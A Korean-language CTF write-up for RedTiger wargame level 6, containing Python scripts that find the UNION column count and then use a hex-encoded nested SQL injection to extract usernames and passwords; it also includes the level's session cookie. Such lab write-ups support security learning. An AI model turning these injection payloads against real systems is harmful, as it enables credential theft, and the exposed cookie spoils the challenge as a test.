[redtiger] level6

server -> DB 예측

• 테이블명: level6_users
• POST 파라미터: user, password

SELECT * FROM tb_name where
user='$_POST["user"]' AND
password='$_POST["password"]'

union select

• 컬럼 개수 확인

import requests
import base64

requests.packages.urllib3.disable_warnings()

url = "https://redtiger.labs.overthewire.org/level6.php"
cookies = {
    "level6login":"my_cat_says_meow_meowmeow"
}

n = 0
bef_ret = ''
for l in range(20):
    params = {
        "user": "0 union select %s from level6_users-- " % str(n)
    }
    print "0 union select %s from level6_users-- " % str(n)
    n = str(n) + "," + str(l+1)
    r = requests.post(url, cookies=cookies, params=params, verify=False)
    if bef_ret!=r.content and bef_ret!='':
        print r.content

    bef_ret = r.content

union select

• 데이터 추출

import requests

requests.packages.urllib3.disable_warnings()

url = "https://redtiger.labs.overthewire.org/level6.php"
cookies = {
    "level6login":"my_cat_says_meow_meowmeow"
}

# 0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f75736572732077686572652069643d33202d2d20
# ' union select 1,username,3,password,5 from level6_users where id=3 --
params = {
    "user": "0 union select 1,0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f75736572732077686572652069643d33202d2d20,3,4,5 from level6_users-- "
}

r = requests.post(url, cookies=cookies, params=params, verify=False)

print r.content